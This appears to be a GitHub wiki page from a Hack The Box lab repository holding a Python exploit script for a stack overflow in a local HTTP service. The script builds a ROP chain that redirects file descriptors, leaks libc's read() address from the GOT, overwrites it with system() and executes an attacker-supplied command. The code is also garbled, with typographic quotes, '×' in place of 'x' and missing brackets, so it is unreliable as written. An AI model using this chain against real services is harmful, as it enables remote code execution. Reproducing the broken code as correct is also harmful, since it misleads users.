omg_smasher - adydawkins/htb-rabbit GitHub Wiki

#!/usr/bin/python
import os, sys, socket
import struct
from pwn import *

addr = (‘127.0.0.1’, 9999)
cmd = sys.argv1+"\0"
libcread_offset = 0xe8050
libcsystem_offset = 0×42510
system_addr = 0×7ffff7a60510

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

payload = ‘’
payload += ’A’ * (568 -5) #total offset 568 – see socket.send [s.send(r’GET /\AAAA’……..

  1. dup2 (4,0) & dup2 (4,1) – to use stdin & stdout
    payload += p64(0×0004011dd) #pop rdi ; ret
    payload += p64(0×4) # stdin/stdout for app
    payload += p64(0×0004011db) #pop rsi ; pop r15 ; ret
    payload += p64(0×0) # stdin
    payload += p64(0×00) # junk
    payload += p64(0×0000e8980) # dup2_libc
    payload += p64(0×0004011dd) #pop rdi ; ret
    payload += p64(0×4) # stdin/stdout for app
    payload += p64(0×0004011db) #pop rsi ; pop r15 ; ret
    payload += p64(0×1) # stdout
    payload += p64(0×00) # junk
    payload += p64(0×0000e8980) # dup2_libc

#write stdin to .dynamic using read@plt (0000000000400cf0 <read@plt>:)
payload += p64(0×0004011dd) #pop rdi; ret
payload += p64(0×00) #stdin #fd arg
payload += p64(0×0004011db) #pop rsi; pop r15; ret
payload += p64(0×000602e28) #.dynamic addr
payload += p64(0×0) # junk for r15
payload += p64(0×000400cf0) #read() call loc

#leak address of read() in randomised libc
payload += p64(0×0004011dd) #pop rdi; ret
payload += p64(0×1) #stdout # fd arg
payload += p64(0×0004011db) #pop rsi; pop r15; ret
payload += p64(0×000603088) #read() in GOT
payload += p64(0×00) #junk for r15
payload += p64(0×400c50) #write() call loc

#call read@plt to overwrite the ptr stored in GOT
payload += p64(0×0004011dd) #pop rdi; ret
payload += p64(0×0) #stdin # fd arg
payload += p64(0×0004011db) #pop rsi; pop r15; ret
payload += p64(0×000603088) #read() in GOT
payload += p64(0×00) # junk for r15
payload += p64(0×000400cf0) #read() call loc

#call read@plt with address of system() in libc
payload += p64(0×00) # bogus, junk
payload += p64(0×000602e28) #.dynamic addr system()
payload += p64(0×000400cf0) #read() call loc

s.connect(addr)
s.send(r’GET /\AAAA’+payload+’ ’+r’HTTP/1.1’+’\n’+’Host: localhost:9999’+’\n’+’User-Agent: curl/7.60.0’+’\n’+’Accept: /‘+’\n’+’\n’+’\n’)

s.send(cmd)

#calculate system() addr and send back
readaddr = struct.unpack(“<Q”, s.recv(1024))0 #keep this line
print “libc read() found at 0x%.8x” % readaddr #keep this line
systemaddr = readaddr – libcread_offset + libcsystem_offset
print “libc system() found at 0x%.8x” % systemaddr
s.send(struct.pack(“<Q”, systemaddr))

print s.recv(1024)

s.close

⚠️ **GitHub.com Fallback** ⚠️